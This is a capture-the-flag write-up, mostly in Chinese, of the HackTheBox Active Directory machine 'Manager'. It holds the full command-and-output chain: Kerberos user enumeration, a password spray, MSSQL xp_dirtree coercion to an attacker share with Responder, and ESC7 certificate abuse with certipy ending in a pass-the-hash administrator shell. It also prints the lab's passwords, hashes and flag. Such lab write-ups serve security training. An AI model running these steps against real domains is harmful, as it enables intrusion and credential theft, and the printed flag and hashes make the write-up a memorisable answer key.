Manager on HackTheBox

William Lin

2025-07-27

AD, ADCS, Active Directory, ESC7, HackTheBox, Pentesting

Before all

這台靶機學到最重要的事：一遇到 AD 一定要先對 NTP

Attacker’s IP: 10.10.16.4
Victim’s IP: 10.10.11.236
Victim’s Host: manager.htb

RECON

port scan

開了 kerberos, dns, http(80), mssql, smb, winrm

┌──(kali🐳kali)-[~/ctf/hackthebox]
└─$ rustscan -a 10.10.11.236 --ulimit 5000 -- -sC -sV -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.236:53
Open 10.10.11.236:80
Open 10.10.11.236:88
Open 10.10.11.236:135
Open 10.10.11.236:139
Open 10.10.11.236:389
Open 10.10.11.236:445
Open 10.10.11.236:464
Open 10.10.11.236:593
Open 10.10.11.236:636
Open 10.10.11.236:1433
Open 10.10.11.236:3269
Open 10.10.11.236:3268
Open 10.10.11.236:5985
Open 10.10.11.236:9389
Open 10.10.11.236:49667
Open 10.10.11.236:49690
Open 10.10.11.236:49693
Open 10.10.11.236:49689
Open 10.10.11.236:49724
Open 10.10.11.236:49742
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV -Pn" on ip 10.10.11.236
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-26 22:11 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:11
Completed NSE at 22:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:11
Completed NSE at 22:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:11
Completed NSE at 22:11, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 22:11
Completed Parallel DNS resolution of 1 host. at 22:11, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:11
Scanning 10.10.11.236 [21 ports]
Discovered open port 53/tcp on 10.10.11.236
Discovered open port 445/tcp on 10.10.11.236
Discovered open port 80/tcp on 10.10.11.236
Discovered open port 49742/tcp on 10.10.11.236
Discovered open port 135/tcp on 10.10.11.236
Discovered open port 49689/tcp on 10.10.11.236
Discovered open port 139/tcp on 10.10.11.236
Discovered open port 49724/tcp on 10.10.11.236
Discovered open port 464/tcp on 10.10.11.236
Discovered open port 49693/tcp on 10.10.11.236
Discovered open port 3268/tcp on 10.10.11.236
Discovered open port 5985/tcp on 10.10.11.236
Discovered open port 636/tcp on 10.10.11.236
Discovered open port 389/tcp on 10.10.11.236
Discovered open port 593/tcp on 10.10.11.236
Discovered open port 49667/tcp on 10.10.11.236
Discovered open port 9389/tcp on 10.10.11.236
Discovered open port 88/tcp on 10.10.11.236
Discovered open port 3269/tcp on 10.10.11.236
Discovered open port 1433/tcp on 10.10.11.236
Discovered open port 49690/tcp on 10.10.11.236
Completed SYN Stealth Scan at 22:11, 0.99s elapsed (21 total ports)
Initiating Service scan at 22:11
Scanning 21 services on 10.10.11.236
Completed Service scan at 22:12, 62.29s elapsed (21 services on 1 host)
NSE: Script scanning 10.10.11.236.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:12
NSE Timing: About 99.97% done; ETC: 22:13 (0:00:00 remaining)
Completed NSE at 22:13, 41.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:13
Completed NSE at 22:13, 4.49s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:13
Completed NSE at 22:13, 0.00s elapsed
Nmap scan report for 10.10.11.236
Host is up, received user-set (0.45s latency).
Scanned at 2025-07-26 22:11:34 EDT for 110s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-27 09:11:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
| SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
| -----BEGIN CERTIFICATE-----
...... <SNIP> ......
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-27T09:13:24+00:00; +7h00m01s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-27T09:13:22+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
| SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
| -----BEGIN CERTIFICATE-----
...... <SNIP> ......
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-27T09:13:24+00:00; +7h00m01s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
| SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
| -----BEGIN CERTIFICATE-----
...... <SNIP> ......
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-27T09:13:22+00:00; +7h00m01s from scanner time.
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49724/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49742/tcp open  unknown       syn-ack ttl 127
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Exploit

Kerbrute username enum

$ kerbrute userenum --dc manager.htb -d manager.htb userlist.txt
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
Version: v1.0.3 (9dad6e1) - 07/26/25 - Ronnie Flathers @ropnop
2025/07/26 22:42:29 >  Using KDC(s):
2025/07/26 22:42:29 >   manager.htb:88
[32m2025/07/26 22:42:51 >  [+] VALID USERNAME:   [email protected]
[32m2025/07/26 22:50:02 >  [+] VALID USERNAME:   [email protected]
[32m2025/07/26 23:02:41 >  [+] VALID USERNAME:   [email protected]
[32m2025/07/26 23:15:05 >  [+] VALID USERNAME:   [email protected]
[32m2025/07/26 23:18:20 >  [+] VALID USERNAME:   [email protected]
[32m2025/07/26 23:19:31 >  [+] VALID USERNAME:   [email protected]
2025/07/26 23:26:44 >  Done! Tested 81475 usernames (6 valid) in 2655.686 seconds

嘗試進行 password spray，發現 operator 帳號密碼重複

1	kerbrute passwordspray userlist.txt --user-as-pass

取得 operator 密碼為 operator

Abuse MSSQL xp_dirtree

看到 MSSQL 第一秒就是去拿 netntlm

┌──(kali🐳kali)-[/tmp/cme_spider_plus]
└─$ impacket-mssqlclient [email protected] -windows-auth         
/home/kali/.local/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> SELECT name FROM sys.databases;
name     
------   
master   

tempdb   

model    

msdb     

SQL (MANAGER\Operator  guest@master)> EXEC master..xp_dirtree '\\10.10.16.4\share\';

在攻擊機：

1	$ responder -I tun0

直接是 DC01$ 的，可惜密碼弄不出來也不是 Computer Name

list dir

......
SQL (MANAGER\Operator  guest@master)> EXEC master..xp_dirtree 'C:\inetpub\wwwroot',1,1;
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1

經過一陣翻找，找到了 http 下的備份 zip
抓下來 unzip 在 .old-conf.xml 中找到 raven 的密碼：

1
2
3

...... <SNIP> ......
<password>R4v3nBe5tD3veloP3r!123</password>
...... <SNIP> ......

USER GET !

ESC 7

1	evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

evil-winrm 先連上去

當前使用者有 AD CS 權限

*Evil-WinRM* PS C:\Users\Raven\DESKTOP> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

利用 certipy-ad 掃描發現 ESC 7 漏洞，擁有的使用者可以植入新的 TEMPLATE 並以任意使用者 impersonate 出去拿到憑證

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Failed to check Web Enrollment for CA 'manager-DC01-CA': module 'collections' has no attribute 'MutableSet'
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment
      HTTP
        Enabled                         : Unknown
      HTTPS
        Enabled                         : Unknown
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
    [+] User ACL Principals             : MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
Certificate Templates                   : [!] Could not find any certificate template

參考： https://www.rbtsec.com/blog/active-directory-certificate-attack-esc7/

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -add-officer raven   
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
                                                                                                                                                                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -enable-template SubCA
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
                                                                                                                                                                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad req -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -template SubCA -target DC01.manager.htb -upn [email protected]
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 21
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '21.key'
[*] Wrote private key to '21.key'
[-] Failed to request certificate
                                                                                                                                                                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -issue-request 21                                                       
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate request ID 21
                                                                                                                                                                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -issue-request 21                                                                                                                 
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad req -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -template SubCA -target DC01.manager.htb -upn [email protected] -retrieve 21
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Retrieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
                                                                                                                                                                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad auth -pfx administrator.pfx                                                                                                                                          
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[-] Got error: Could not find a target in the specified options
[-] Use -debug to print a stacktrace
                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
                                                                                                                                                                                                                                         
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ sudo su                       
┌──(root㉿kali)-[/home/kali/ctf]
└─# timedatectl set-ntp off                      
                                                                                                                                                                                                                                         
┌──(root㉿kali)-[/home/kali/ctf]
└─# rdate -n 10.10.11.236  
rdate: Inconsistent times received from NTP server
rdate: Unable to get a reasonable time estimate
                                                                                                                                                                                                                                         
┌──(root㉿kali)-[/home/kali/ctf]
└─# rdate -n 10.10.11.236
rdate: Inconsistent times received from NTP server
rdate: Unable to get a reasonable time estimate
                                                                                                                          
┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Pass The Hash 結束這局

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
cd ..\

    Directory: C:\Users\Administrator\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/29/2023   8:09 AM                WindowsPowerShell


DESKTOP
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\DESKTOP
*Evil-WinRM* PS C:\Users\Administrator\DESKTOP> CAT ROOT.TXT
69b7f90ce68cb9621c18f5ccd7c211e5